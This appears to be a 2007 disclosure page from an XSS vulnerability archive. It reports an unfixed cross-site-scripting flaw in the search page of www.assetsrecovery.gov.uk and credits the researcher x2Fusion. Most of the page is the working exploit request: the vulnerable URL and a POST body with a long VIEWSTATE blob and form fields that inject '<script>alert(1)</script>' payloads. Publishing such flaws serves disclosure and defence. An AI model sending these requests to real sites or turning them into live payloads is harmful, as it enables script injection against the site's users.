Advertisements:
Security researcher x2Fusion, has submitted on 23/08/2007 a cross-site-scripting (XSS) vulnerability affecting www.assetsrecovery.gov.uk, which at the time of submission ranked 1589977 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 23/08/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.
Date submitted: 23/08/2007 Date published: 23/08/2007 Fixed? Mail us!Status:  UNFIXED
Author: x2Fusion Domain: www.assetsrecovery.gov.uk Category: XSS Pagerank: 1589977
URL: http://www.assetsrecovery.gov.uk/ARAWeb/Templates/searchPage.aspx?NRMODE=Published&NRNODEGUID=%7bA85
F8395-EC74-4CE7-AFBB-2251E8AD8772%7d&NRORIGINALURL=%2fSearch&NRCACHEHINT=Guest
POST: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=dDwtOTE4MDczNjU3O3Q8O2w8aTwxPjs%2BO2w8dDw7bDxpPDc%2BOz47 bDx0PDtsPGk8MD47aTwyPjtpPDQ%2BO2k8MTQ%2BO2k8MTg%2BO2k8MjI%2BOz47bDx0PHA8bDxtb2RlO3pvb21leHByZXNzaW9u O3NldHRpbmdzO2NvbGxlY3Rpb25zO3NvcnRjcml0ZXJpYTtxdWVyeWV4cGFuZGVkYnl1c2VyOz47bDxDb3Zlby5DRVMuV2ViLlNl YXJjaC5Db250cm9scy5TZWFyY2hDb250cm9sK01vZGVFbnVtLCBDb3Zlby5DRVMuV2ViLlNlYXJjaCwgVmVyc2lvbj0xLjAuMS4w LCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTQ0MTEwZDE2ODI1MjIxZjI8Tm9ybWFsPjtcZTtiPEFBRUFBQUQvLy8v L0FRQUFBQUFBQUFBTUFnQUFBRmREYjNabGJ5NURSVk11VjJWaUxsTmxZWEpqYUN3Z1ZtVnljMmx2YmoweExqQXVNUzR3TENCRGRX eDBkWEpsUFc1bGRYUnlZV3dzSUZCMVlteHBZMHRsZVZSdmEyVnVQVFEwTVRFd1pERTJPREkxTWpJeFpqSUZBUUFBQUN4RGIzWmxi eTVEUlZNdVYyVmlMbE5sWVhKamFDNVRaV0Z5WTJoVFpYUjBhVzVuUTI5c2JHVmpkR2x2YmdFQUFBQUtiVjlUWlhSMGFXNW5jd01j VTNsemRHVnRMa052Ykd4bFkzUnBiMjV6TGtoaGMyaDBZV0pzWlFJQUFBQUpBd0FBQUFRREFBQUFIRk41YzNSbGJTNURiMnhzWldO MGFXOXVjeTVJWVhOb2RHRmliR1VIQUFBQUNreHZZV1JHWVdOMGIzSUhWbVZ5YzJsdmJnaERiMjF3WVhKbGNoQklZWE5vUTI5a1pW QnliM1pwWkdWeUNFaGhjMmhUYVhwbEJFdGxlWE1HVm1Gc2RXVnpBQUFEQXdBRkJRc0lIRk41YzNSbGJTNURiMnhzWldOMGFXOXVj eTVKUTI5dGNHRnlaWElrVTNsemRHVnRMa052Ykd4bFkzUnBiMjV6TGtsSVlYTm9RMjlrWlZCeWIzWnBaR1Z5Q094Uk9EOGpBQUFB Q2dvdkFBQUFDUVFBQUFBSkJRQUFBQkFFQUFBQUVRQUFBQVlHQUFBQUQwRnNiRTltVkdobGMyVlhiM0prY3dZSEFBQUFDMDFwYm1s dGRXMUVZWFJsQmdnQUFBQUdSbTl5YldGMEJna0FBQUFJVEdGdVozVmhaMlVHQ2dBQUFBUlRhWHBsQmdzQUFBQUxSWGhoWTNSUWFI SmhjMlVHREFBQUFBNUdhV1ZzWkVCemVYTjBhWFJzWlFZTkFBQUFFVTF2WkdsbWFXVmtTVzVVYUdWTVlYTjBCZzRBQUFBTVJtbGxi R1JBYzNsemRYSnBCZzhBQUFBUFFXNTVUMlpVYUdWelpWZHZjbVJ6QmhBQUFBQU1VbVZtYVc1bFFubFVlWEJsQmhFQUFBQU9VbVZt YVc1bFFubEJkWFJvYjNJR0VnQUFBQVZSZFdWeWVRWVRBQUFBQzBOMWMzUnZiVkYxWlhKNUJoUUFBQUFRVG05dVpVOW1WR2hsYzJW WGIzSmtjd1lWQUFBQUMwMWhlR2x0ZFcxRVlYUmxCaFlBQUFBUFJtbGxiR1JBYzNsellYVjBhRzl5RUFVQUFBQVJBQUFBQ1JjQUFB QUpHQUFBQUFrWkFBQUFDUm9BQUFBSkd3QUFBQWtjQUFBQUNSMEFBQUFKSGdBQUFBa2ZBQUFBQ1NBQUFBQUpJUUFBQUFraUFBQUFD U01BQUFBSkpBQUFBQWtsQUFBQUNTWUFBQUFKSndBQUFBVVhBQUFBTkVOdmRtVnZMa05GVXk1WFpXSXVVMlZoY21Ob0xsTmxkSFJw Ym1kekxrRnNiRTltVkdobGMyVlhiM0prYzFObGRIUnBibWNCQUFBQUIyMWZWMjl5WkhNQkFnQUFBQVlvQUFBQUFBVVlBQUFBTUVO dmRtVnZMa05GVXk1WFpXSXVVMlZoY21Ob0xsTmxkSFJwYm1kekxrMXBibWx0ZFcxRVlYUmxVMlYwZEdsdVp3RUFBQUFHYlY5RVlY UmxBQTBDQUFBQUFBQUFBQUFBQUFBRkdRQUFBQ3REYjNabGJ5NURSVk11VjJWaUxsTmxZWEpqYUM1VFpYUjBhVzVuY3k1R2IzSnRZ WFJUWlhSMGFXNW5BUUFBQUFodFgwWnZjbTFoZEFRZlEyOTJaVzh1UTBWVExsZGxZaTVUWldGeVkyZ3VSbTl5YldGMFJXNTFiUUlB QUFBQ0FBQUFCZGYvLy84ZlEyOTJaVzh1UTBWVExsZGxZaTVUWldGeVkyZ3VSbTl5YldGMFJXNTFiUUVBQUFBSGRtRnNkV1ZmWHdB SUFnQUFBQUFBQUFBRkdnQUFBQzFEYjNabGJ5NURSVk11VjJWaUxsTmxZWEpqYUM1VFpYUjBhVzVuY3k1TVlXNW5kV0ZuWlZObGRI UnBibWNCQUFBQUNtMWZUR0Z1WjNWaFoyVUVJVU52ZG1WdkxrTkZVeTVYWldJdVUyVmhjbU5vTGt4aGJtZDFZV2RsUlc1MWJRSUFB QUFDQUFBQUJkYi8vLzhoUTI5MlpXOHVRMFZUTGxkbFlpNVRaV0Z5WTJndVRHRnVaM1ZoWjJWRmJuVnRBUUFBQUFkMllXeDFaVjlm QUFnQ0FBQUFBQUFBQUFVYkFBQUFLVU52ZG1WdkxrTkZVeTVYWldJdVUyVmhjbU5vTGxObGRIUnBibWR6TGxOcGVtVlRaWFIwYVc1 bkFnQUFBQTV0WDFKbGJHRjBhWFpsYm1WemN3WnRYMU5wZW1VRUFDbERiM1psYnk1RFJWTXVWMlZpTGxObFlYSmphQzVUYVhwbFVt VnNZWFJwZG1WdVpYTnpSVzUxYlFJQUFBQUpBZ0FBQUFYVi8vLy9LVU52ZG1WdkxrTkZVeTVYWldJdVUyVmhjbU5vTGxOcGVtVlNa V3hoZEdsMlpXNWxjM05GYm5WdEFRQUFBQWQyWVd4MVpWOWZBQWdDQUFBQUFBQUFBQUFBQUFBQUFBQUFCUndBQUFBd1EyOTJaVzh1 UTBWVExsZGxZaTVUWldGeVkyZ3VVMlYwZEdsdVozTXVSWGhoWTNSUWFISmhjMlZUWlhSMGFXNW5BUUFBQUFsdFgxQm9jbUZ6WlhN QkFnQUFBQWtvQUFBQUJSMEFBQUFxUTI5MlpXOHVRMFZUTGxkbFlpNVRaV0Z5WTJndVUyVjBkR2x1WjNNdVJtbGxiR1JUWlhSMGFX NW5Bd0FBQUFkdFgwWnBaV3hrQ20xZlQzQmxjbUYwYjNJSGJWOVdZV3gxWlFFRUFTWkRiM1psYnk1RFJWTXVWMlZpTGxObFlYSmph QzVHYVdWc1pFOXdaWEpoZEc5eVJXNTFiUUlBQUFBQ0FBQUFCaXdBQUFBSlFITjVjM1JwZEd4bEJkUC8vLzhtUTI5MlpXOHVRMFZU TGxkbFlpNVRaV0Z5WTJndVJtbGxiR1JQY0dWeVlYUnZja1Z1ZFcwQkFBQUFCM1poYkhWbFgxOEFDQUlBQUFBQUFBQUFDU2dBQUFB RkhnQUFBRFpEYjNabGJ5NURSVk11VjJWaUxsTmxZWEpqYUM1VFpYUjBhVzVuY3k1TmIyUnBabWxsWkVsdVZHaGxUR0Z6ZEZObGRI UnBibWNDQUFBQUJtMWZWVzVwZEFkdFgxWmhiSFZsQkFBaFEyOTJaVzh1UTBWVExsZGxZaTVUWldGeVkyZ3VWR2x0WlZWdWFYUkZi blZ0QWdBQUFBZ0NBQUFBQmRILy8vOGhRMjkyWlc4dVEwVlRMbGRsWWk1VFpXRnlZMmd1VkdsdFpWVnVhWFJGYm5WdEFRQUFBQWQy WVd4MVpWOWZBQWdDQUFBQUFBQUFBQUFBQUFBQkh3QUFBQjBBQUFBR01BQUFBQWRBYzNsemRYSnBBYy8vLy8vVC8vLy9BQUFBQUFr b0FBQUFCU0FBQUFBMFEyOTJaVzh1UTBWVExsZGxZaTVUWldGeVkyZ3VVMlYwZEdsdVozTXVRVzU1VDJaVWFHVnpaVmR2Y21SelUy VjBkR2x1WndFQUFBQUhiVjlYYjNKa2N3RUNBQUFBQ1NnQUFBQUZJUUFBQURGRGIzWmxieTVEUlZNdVYyVmlMbE5sWVhKamFDNVRa WFIwYVc1bmN5NVNaV1pwYm1WQ2VWUjVjR1ZUWlhSMGFXNW5BUUFBQUFodFgwWnZjbTFoZEFRZlEyOTJaVzh1UTBWVExsZGxZaTVU WldGeVkyZ3VSbTl5YldGMFJXNTFiUUlBQUFBQ0FBQUFBYzMvLy8vWC8vLy9BQUFBQUFVaUFBQUFNME52ZG1WdkxrTkZVeTVYWldJ dVUyVmhjbU5vTGxObGRIUnBibWR6TGxKbFptbHVaVUo1UVhWMGFHOXlVMlYwZEdsdVp3RUFBQUFJYlY5QmRYUm9iM0lCQWdBQUFB a29BQUFBQlNNQUFBQXFRMjkyWlc4dVEwVlRMbGRsWWk1VFpXRnlZMmd1VTJWMGRHbHVaM011VVhWbGNubFRaWFIwYVc1bkFRQUFB QXh0WDBWNGNISmxjM05wYjI0QkFnQUFBQVkwQUFBQUdUeHpZM0pwY0hRK1lXeGxjblFvTVNrOEwzTmpjbWx3ZEQ0RkpBQUFBREJE YjNabGJ5NURSVk11VjJWaUxsTmxZWEpqYUM1VFpYUjBhVzVuY3k1RGRYTjBiMjFSZFdWeWVWTmxkSFJwYm1jQkFBQUFERzFmUlho d2NtVnpjMmx2YmdFQ0FBQUFDU2dBQUFBRkpRQUFBRFZEYjNabGJ5NURSVk11VjJWaUxsTmxZWEpqYUM1VFpYUjBhVzVuY3k1T2Iy NWxUMlpVYUdWelpWZHZjbVJ6VTJWMGRHbHVad0VBQUFBSGJWOVhiM0prY3dFQ0FBQUFDU2dBQUFBRkpnQUFBREJEYjNabGJ5NURS Vk11VjJWaUxsTmxZWEpqYUM1VFpYUjBhVzVuY3k1TllYaHBiWFZ0UkdGMFpWTmxkSFJwYm1jQkFBQUFCbTFmUkdGMFpRQU5BZ0FB QUFBQUFBQUFBQUFBQVNjQUFBQWRBQUFBQmpZQUFBQUtRSE41YzJGMWRHaHZjZ0hKLy8vLzAvLy8vd0FBQUFBSktBQUFBQXM9Pjts PEFSQVdlYjs%2BO0NFU1NlYXJjaC5Tb3J0Q3JpdGVyaWEsIEludGVyb3AuQ0VTU2VhcmNoLCBWZXJzaW9uPTMuMC4wLjAsIEN1bH R1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Y2JiOGMxZjMyYWI0NmExYzxSZWxldmFuY3k%2BO288Zj47Pj47bDxpPDA%2BOz 47bDx0PHA8cDxsPGZyZXNobmVzcztUZXh0Oz47bDxpPDI%2BO1w8c2NyaXB0XD5hbGVydCgxKVw8L3NjcmlwdFw%2BOz4%2BO3A8 bDxvbmtleXByZXNzOz47bDxpZiAod2luZG93LmV2ZW50LmtleUNvZGUgPT0gMTMpIHsgX19kb1Bvc3RCYWNrKCdDRVNTZWFyY2gx Ol9jdGwwJywncmVzZXRzZWFyY2gnKVw7IHJldHVybiBmYWxzZVw7IH07Pj4%2BOzs%2BOz4%2BO3Q8O2w8aTwwPjs%2BO2w8dDxw PHA8bDxWaXNpYmxlOz47bDxvPHQ%2BOz4%2BOz47bDxpPDM%2BOz47bDx0PDtsPGk8MT47PjtsPHQ8cDxwPGw8ZnJlc2huZXNzO1 RleHQ7PjtsPGk8MD47XDxzY3JpcHRcPmFsZXJ0KDEpXDwvc2NyaXB0XD47Pj47cDxsPG9ua2V5cHJlc3M7PjtsPGlmICh3aW5kb3 cuZXZlbnQua2V5Q29kZSA9PSAxMykgeyBfX2RvUG9zdEJhY2soJ0NFU1NlYXJjaDE6X2N0bDAnLCdyZXNldHNlYXJjaCcpXDsgcm V0dXJuIGZhbHNlXDsgfTs%2BPj47Oz47Pj47Pj47Pj47dDw7bDxpPDA%2BOz47bDx0PDtsPGk8NT47aTw3PjtpPDk%2BOz47bDx0 PDtsPGk8Mz47aTw1PjtpPDc%2BO2k8OT47aTwxMj47PjtsPHQ8cDxwPGw8ZnJlc2huZXNzO1RleHQ7PjtsPGk8Mj47XGU7Pj47Pj s7Pjt0PHA8cDxsPGZyZXNobmVzcztUZXh0Oz47bDxpPDI%2BO1xlOz4%2BOz47Oz47dDxwPHA8bDxmcmVzaG5lc3M7VGV4dDs%2B O2w8aTwyPjtcZTs%2BPjs%2BOzs%2BO3Q8cDxwPGw8ZnJlc2huZXNzO1RleHQ7PjtsPGk8Mj47XGU7Pj47Pjs7Pjt0PHA8cDxsPG ZyZXNobmVzcztUZXh0Oz47bDxpPDI%2BO1xlOz4%2BOz47Oz47Pj47dDw7bDxpPDI%2BOz47bDx0PDtsPGk8MD47aTwzPjtpPDQ% 2BO2k8NT47PjtsPHQ8cDxwPGw8Q2hlY2tlZDs%2BO2w8bzx0Pjs%2BPjs%2BOzs%2BO3Q8cDxwPGw8ZnJlc2huZXNzO0VuYWJsZW Q7PjtsPGk8MT47bzxmPjs%2BPjs%2BO2w8aTwwPjtpPDE%2BOz47bDx0PHA8cDxsPFRleHQ7RW5hYmxlZDs%2BO2w8XGU7bzxmPj s%2BPjs%2BOzs%2BO3Q8dDxwPHA8bDxFbmFibGVkOz47bDxvPGY%2BOz4%2BOz47O2w8aTwwPjs%2BPjs7Pjs%2BPjt0PHA8cDxs PGZyZXNobmVzcztFbmFibGVkOz47bDxpPDE%2BO288Zj47Pj47PjtsPGk8MD47aTwxPjtpPDI%2BOz47bDx0PHQ8cDxwPGw8RW5h YmxlZDs%2BO2w8bzxmPjs%2BPjs%2BOztsPGk8MD47Pj47Oz47dDx0PHA8cDxsPEVuYWJsZWQ7PjtsPG88Zj47Pj47Pjs7bDxpPD A%2BOz4%2BOzs%2BO3Q8dDxwPHA8bDxFbmFibGVkOz47bDxvPGY%2BOz4%2BOz47O2w8aTwwPjs%2BPjs7Pjs%2BPjt0PHA8cDxs PGZyZXNobmVzcztFbmFibGVkOz47bDxpPDE%2BO288Zj47Pj47PjtsPGk8MD47aTwxPjtpPDI%2BOz47bDx0PHQ8cDxwPGw8RW5h YmxlZDs%2BO2w8bzxmPjs%2BPjs%2BOztsPGk8MD47Pj47Oz47dDx0PHA8cDxsPEVuYWJsZWQ7PjtsPG88Zj47Pj47Pjs7bDxpPD A%2BOz4%2BOzs%2BO3Q8dDxwPHA8bDxFbmFibGVkOz47bDxvPGY%2BOz4%2BOz47O2w8aTwwPjs%2BPjs7Pjs%2BPjs%2BPjs%2B Pjt0PDtsPGk8Mz47aTw1PjtpPDc%2BO2k8MTA%2BO2k8MTI%2BO2k8MTQ%2BOz47bDx0PHQ8cDxwPGw8ZnJlc2huZXNzOz47bDxp PDI%2BOz4%2BOz47O2w8aTwwPjs%2BPjs7Pjt0PHA8cDxsPGZyZXNobmVzczs%2BO2w8aTwyPjs%2BPjs%2BO2w8aTwwPjtpPDE% 2BO2k8Mj47PjtsPHQ8dDw7O2w8aTwwPjs%2BPjs7Pjt0PHA8cDxsPFRleHQ7PjtsPFxlOz4%2BOz47Oz47dDx0PDs7bDxpPDA%2B Oz4%2BOzs%2BOz4%2BO3Q8dDxwPHA8bDxmcmVzaG5lc3M7PjtsPGk8Mj47Pj47Pjs7bDxpPDA%2BOz4%2BOzs%2BO3Q8cDxwPGw8 ZnJlc2huZXNzOz47bDxpPDI%2BOz4%2BOz47bDxpPDA%2BO2k8Mj47PjtsPHQ8dDw7O2w8aTwwPjs%2BPjs7Pjt0PHA8cDxsPFRl eHQ7PjtsPFxlOz4%2BOz47Oz47Pj47dDxwPHA8bDxmcmVzaG5lc3M7PjtsPGk8Mj47Pj47PjtsPGk8MD47aTwyPjs%2BO2w8dDx0 PDs7bDxpPDA%2BOz4%2BOzs%2BO3Q8cDxwPGw8VGV4dDs%2BO2w8XGU7Pj47Pjs7Pjs%2BPjt0PHA8cDxsPGZyZXNobmVzczs%2B O2w8aTwyPjs%2BPjs%2BO2w8aTwwPjtpPDI%2BOz47bDx0PHQ8OztsPGk8MD47Pj47Oz47dDxwPHA8bDxUZXh0Oz47bDxcZTs%2B Pjs%2BOzs%2BOz4%2BOz4%2BOz4%2BOz4%2BO3Q8O2w8aTwwPjs%2BO2w8dDxwPHA8bDxyZXN1bHRwYWdlO3N0b3BmaWx0ZXJpbm dkdXBsaWNhdGVzO3N0b3BvcHRpbWl6aW5nO3NpbmdsZXJlc3VsdGluZGV4O3NpbmdsZXJlc3VsdGlkO1Zpc2libGU7PjtsPGk8MD 47bzxmPjtvPGY%2BO2k8MD47XGU7bzx0Pjs%2BPjs%2BOzs%2BOz4%2BO3Q8cDxwPGw8VmlzaWJsZTs%2BO2w8bzxmPjs%2BPjs% 2BOzs%2BO3Q8O2w8aTwwPjs%2BO2w8dDxwPHA8bDxWaXNpYmxlOz47bDxvPHQ%2BOz4%2BOz47Oz47Pj47Pj47Pj47Pj47PnhV6M U1n0TVNsgEjrUwgJOw3%2BiA&CESSearch1%3A_ctl0%3ACESSearch1__ctl0__ctl0=%3Cscript%3Ealert%281%29%3C%2Fs cript%3E&CESSearch1%3A_ctl1%3Asearch%3A_ctl1%3Aquery=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&C ESSearch1%3A_ctl1%3Asearch%3A_ctl1%3Asearchbutton=Search&CESSearch1__ctl0_timezoneoffset=120
Click here to view the mirror
Buy XSS Attacks book from Amazon!
XSS Attacks
Cross Site Scripting Exploits and Defense
Buy Detecting Malice book from RSnake
Website Fraud Loss Prevention
Advertisements
Home | News | Articles | Advisories | Submit | Alerts | Links | What is XSS | About | Contact | Some Rights Reserved.